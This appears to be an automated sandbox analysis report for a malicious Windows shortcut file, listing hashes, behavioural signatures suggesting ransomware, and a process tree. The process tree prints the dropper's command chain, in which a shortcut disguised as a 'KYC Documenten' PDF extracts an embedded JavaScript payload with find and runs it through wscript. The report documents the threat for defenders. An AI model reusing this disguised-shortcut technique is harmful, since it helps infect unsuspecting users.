Analysis
-
max time kernel
44s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
20-05-2022 13:59
Static task
static1
Behavioral task
behavioral1
Sample
3c68fd735f165dfed20be28518aa425e8537a84b93a84d85d501e6d9b8f3417d.lnk
Resource
win7-20220414-en
windows7_x64
0 signatures
0 seconds
General
-
Target
3c68fd735f165dfed20be28518aa425e8537a84b93a84d85d501e6d9b8f3417d.lnk
-
Size
2KB
-
MD5
5cfc2d030aaf562aa03237f52ba7115a
-
SHA1
f37eaea4dba612c383e582a73010ac4028499f11
-
SHA256
3c68fd735f165dfed20be28518aa425e8537a84b93a84d85d501e6d9b8f3417d
-
SHA512
22b6c93e31f89efb7384e8c8fad23b037286b3b72b92ba7aeeb19b29a8d27743f46d465d433663c18d0aac861eaced58dbfc8268f0d02a279f99c998483278ab
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 536 wrote to memory of 1832 536 cmd.exe 29 PID 536 wrote to memory of 1832 536 cmd.exe 29 PID 536 wrote to memory of 1832 536 cmd.exe 29 PID 1832 wrote to memory of 1776 1832 cmd.exe 30 PID 1832 wrote to memory of 1776 1832 cmd.exe 30 PID 1832 wrote to memory of 1776 1832 cmd.exe 30 PID 1832 wrote to memory of 1924 1832 cmd.exe 31 PID 1832 wrote to memory of 1924 1832 cmd.exe 31 PID 1832 wrote to memory of 1924 1832 cmd.exe 31 PID 1832 wrote to memory of 1164 1832 cmd.exe 32 PID 1832 wrote to memory of 1164 1832 cmd.exe 32 PID 1832 wrote to memory of 1164 1832 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\3c68fd735f165dfed20be28518aa425e8537a84b93a84d85d501e6d9b8f3417d.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&move "KYC Documenten.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "END2">"C:\Users\Admin\AppData\Local\Temp\0.js"&wscript "C:\Users\Admin\AppData\Local\Temp\0.js"2⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""3⤵PID:1776
-
-
C:\Windows\system32\find.exefind "END2"3⤵PID:1924
-
-
C:\Windows\system32\wscript.exewscript "C:\Users\Admin\AppData\Local\Temp\0.js"3⤵PID:1164
-
-